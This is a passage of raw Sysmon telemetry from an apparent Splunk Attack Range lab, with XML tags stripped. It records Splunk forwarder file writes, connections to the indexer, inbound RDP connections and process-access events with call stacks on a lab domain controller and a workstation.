Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A26EB27B7A6038AC8823B8476560269,SHA256=2DF7B684EE4284CE1B2ABFBF7787DB140C122C69E2A69CEAE4D860F6BCB5AF90,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048800Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:14.896{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53260-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048805Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:18.855{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F3FDC3177BAF0B05468666A895A3D46,SHA256=F9511AF5A0E5F691F73B8DA7E4A8BE086511923775CC68B03EBD7AFBAE09E424,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977422Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:18.840{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2FB5F6CADD71D8F7295DF02512F975C6,SHA256=D8DE2D2D8FD177A3AE71B5DEDF187F2473E15EA02DCE29BA0E7CADA199F5DC33,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977421Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:14.845{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-34087-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977420Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:18.418{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36C7C27BDE93B115C89BE9BD6A5D71C2,SHA256=20B7684BC7A0F54997E78391145F5E5A0486B89EF830940D8E811106DAEABD8C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048804Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:15.995{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53261-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001048803Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:15.995{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53261-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 23542300x80000000000000001048806Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:19.857{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8681408589B663D49D0BA6E8D61EEFF,SHA256=65F454C75A0AABEB5094C423D4BBC2A9FD23EF18CA4B1EE44DA09302CEA2E4C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977425Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:19.856{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA1F07B3C694F1A4894C50305B1211E0,SHA256=A5F2F5C338FF0F562E7938EB6E5BF54E8E36379F46521704EC2E9305A716ED10,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977424Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:15.724{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51216-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977423Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:19.434{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC21DD62E036850E73D4DF4DE428F405,SHA256=54C5A0C5875AD62FFBE0FA382529BF034616D447D241C4FBD6CBD9BD33E89E5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048808Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:20.887{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D3A18EAC469D275D71945918F7B13E6,SHA256=893F77B80ED31AF89D7C12DFA6C8ACBC94755AFBE8E9BDFC0F3CBED3B9F13C8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977426Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:20.434{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A1AC72C0210F10F406A139C49F3E3E9,SHA256=F5FCB87B283DD6EBBF70605431D9E1FAE6C8BD19CB6DB047CBB663CEF3121FDC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048807Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:18.251{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52260-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048811Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:21.955{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B563A2C3B7C2AA2970D33709F04C30B,SHA256=4844EF37049F9AC0A537B92C01AED43DD43725AFD0BAC9D8E48E4C8F46734FDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977429Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:21.450{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=395A27729E03FE70720EDD50CE9D3FEA,SHA256=CD5DAE4305FD6AEEC3BA9304A9F91C92E61FD39ADCB2557513363AC336C19E56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048810Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:21.528{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210924073323-4301MD5=3A908804D0573FF7380F514264884FB3,SHA256=C81D2F048F52EDBC4290754297EEBE81A82636336939823758E35E4C6AD1E005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048809Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:21.209{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=381146BB2076FF0FAE6594020E49CA6B,SHA256=F7FDAF7B7C7D8FF205751570C4B1409691CD62DE56E486EBF99C32FEE43AB623,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977428Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:18.854{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-3045-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977427Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:17.828{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59305-false10.0.1.12-8000- 23542300x80000000000000001048813Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:22.970{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D141F88E139D4DE12C73FB1C39C62D20,SHA256=717E873429F289391D949192203A14A783D001BDAFD41CB59DE09B53483D69BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977432Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:22.450{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9646FC3AD45AA835B5A1833DF33D17E5,SHA256=9BCBC32603A3F9C9C396658787A8E81A23A10E433CD6012AF6E7F4CD7EF310DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048812Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:22.540{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210924073320-4302MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977431Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:19.466{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-55062-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977430Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:22.012{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6BF24F3126DC18C2F1043A326C7E350B,SHA256=9B7A77BF37CACDFB8802CCB63D774A1D621FEDA6771B2ABDAA4B2C88989B5842,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977435Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:20.411{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-54204-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977434Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:23.451{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BBDC12301C10ABB7DDD6B816CC02AEE,SHA256=B29C7D628B3E40B782DE11A6C18990994D9E15748CB98369130BA0DAA765739E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048815Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:23.909{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048814Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:20.916{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53262-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000977433Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:23.232{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EA15CCA91EE8A16B5EB8CEED0A4D4037,SHA256=BE6910D750AC411ECF5597A6AA5F03CAAC75F0AFEB33FCCD599BD5D3712FAE5B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977437Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:21.054{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-15300-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977436Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:24.451{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76F7EF6711BC52274FEF43DD5E82E354,SHA256=E80DA69163311FAA605F1E492C28188C56EDAA01A853ED6E3519CBE599F0952C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048816Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:24.025{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BA45F2BDC230277EC3DFC758305194F,SHA256=647E0AABE05024D07065113360D607B0E2507AA0C4D30223BDA53EB761407075,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977451Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:25.919{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8955-6151-9679-00000000FD01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977450Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:25.919{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977449Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:25.919{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977448Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:25.919{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977447Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:25.919{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977446Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:25.919{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977445Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:25.919{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977444Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:25.919{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977443Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:25.919{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977442Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:25.919{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977441Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:25.919{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8955-6151-9679-00000000FD01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977440Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:25.919{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8955-6151-9679-00000000FD01}1312C:\Program 